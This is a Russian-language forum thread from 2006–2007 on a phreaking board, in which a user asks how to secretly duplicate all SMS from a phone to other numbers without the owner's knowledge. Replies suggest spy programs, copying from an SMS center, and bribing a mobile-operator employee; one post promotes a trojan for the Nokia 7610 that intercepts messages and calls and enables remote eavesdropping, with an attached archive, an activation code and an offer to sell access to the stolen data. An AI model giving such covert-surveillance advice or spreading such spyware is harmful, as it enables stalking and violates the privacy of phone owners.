Изучение уязвимостей электронных систем.

key programming immo tools emergency start device программаторы ключа заводилки Кодграббер штатных охранных систем, toyota, lexus, subaru.

Вернуться   Изучение уязвимостей электронных систем > Фрикинг > Всё по теме электронного взлома

Всё по теме электронного взлома Всё что не подходит под другие разделы. Игровые аппараты, электрические счётчики, таксофоны и тд.

Ответ

Опции темы
Старый 16.11.2006, 11:29   #1
test
Гость

Лампочка СМС

есть доступ к телефону, реально ли сделать так, чтобы все СМС с этого телефона дублировались, незаметно для владельца, на еще несколько номеров, или на один??
Старый 18.11.2006, 03:56   #2
Delta100
участник

Поблагодарил: 1
Поблагодарили 8 раз в 5 сообщениях
Delta100 стоит на развилке

естли Симбиоз на нем то прогу спай поисчи..
Delta100 вне форума   Ответить с цитированием
Старый 05.04.2007, 12:33   #3
A11ax
редкий гость

Поблагодарил: 0
Поблагодарили 2 раз в 2 сообщениях
A11ax стоит на развилке

приди в центр отправки смс и там с сервока скапируй всё на диск и разошли вот и всё

Фриверт всем!!!!
A11ax вне форума   Ответить с цитированием
Старый 26.04.2007, 01:00   #4
SS
случайно влез

Поблагодарили 0 раз в 0 сообщениях
SS стоит на развилке

Цитата:
Сообщение от Mar4 Посмотреть сообщение
есть доступ к телефону, реально ли сделать так, чтобы все СМС с этого телефона дублировались, незаметно для владельца, на еще несколько номеров, или на один??

Если телефон обычный - вряд ли. Технически это конечно возможно есть Java вирусы, которые отправлят смс на платные номера. Но Java вируса-шпиона пока не встречал.
SS вне форума   Ответить с цитированием
Старый 07.05.2007, 01:36   #5
vova1978
случайно влез

vova1978 стоит на развилке

Не имея доступа к серверу оператора - нет
vova1978 вне форума   Ответить с цитированием
Старый 07.05.2007, 02:00   #6
NLP
редкий гость

Поблагодарили 8 раз в 7 сообщениях
NLP стоит на развилке

программа троян перехватывает все данные телефона смс разговоры есть возможность отдаленно подключится к телеону при разговоре и прослушивать беседу
программа на nokia 7610 дальше ссылка по установке программы [Ссылки могут видеть только зарегистрированные пользователи. ] после установки для ативации вам понадобится код 0463795474 если закачивать будите через мобильник то ссылка для закачки [Ссылки могут видеть только зарегистрированные пользователи. ] и код активации 0463795474 после прочтения интрукции и активации программы пишите мне в личку дам полный отчет об всех звонках и смс также имей коды и так далее................а если захотите приобрести доступ куда приходит все данные то пишите на мыло [Ссылки могут видеть только зарегистрированные пользователи. ] или суда в личку.
Вложения
Тип файла: rar SPY.rar (112.2 Кб, 53 просмотров)

мой голос останется с вами
NLP вне форума   Ответить с цитированием
Старый 22.06.2007, 22:57   #7
test
Гость

Заплати работнику сотовой компании и ему хорошо и тебе радость.
Старый 18.07.2007, 17:17   #8
test
Гость

Цитата:
Сообщение от NLP Посмотреть сообщение
программа троян перехватывает все данные телефона смс разговоры есть возможность отдаленно подключится к телеону при разговоре и прослушивать беседу
программа на nokia 7610 дальше ссылка по установке программы [Ссылки могут видеть только зарегистрированные пользователи. ] после установки для ативации вам понадобится код 0463795474 если закачивать будите через мобильник то ссылка для закачки [Ссылки могут видеть только зарегистрированные пользователи. ] и код активации 0463795474 после прочтения интрукции и активации программы пишите мне в личку дам полный отчет об всех звонках и смс также имей коды и так далее................а если захотите приобрести доступ куда приходит все данные то пишите на мыло [Ссылки могут видеть только зарегистрированные пользователи. ] или суда в личку.

a eta trojan lish na nokia 7610 rabotaet??
Старый 23.07.2007, 21:55   #9
Илья Муромец
случайно влез

Илья Муромец стоит на развилке

Цитата:
Сообщение от NLP Посмотреть сообщение

Большинством своим так распространяются обычные трояны!
Илья Муромец вне форума   Ответить с цитированием
Старый 29.07.2007, 01:33   #10
test
Гость

Подскажи пожалуйста,а как получить доступ куда приходят все шпионские данные.Я залил шпиона в смарт под твоим паролем.Теперь ты можешь меня контролировать.Я не против,я не рецидив.Ну все равно напиши как получить доступ.Буду те оч благодарен.Или как ее зарегить на себя?
Ответ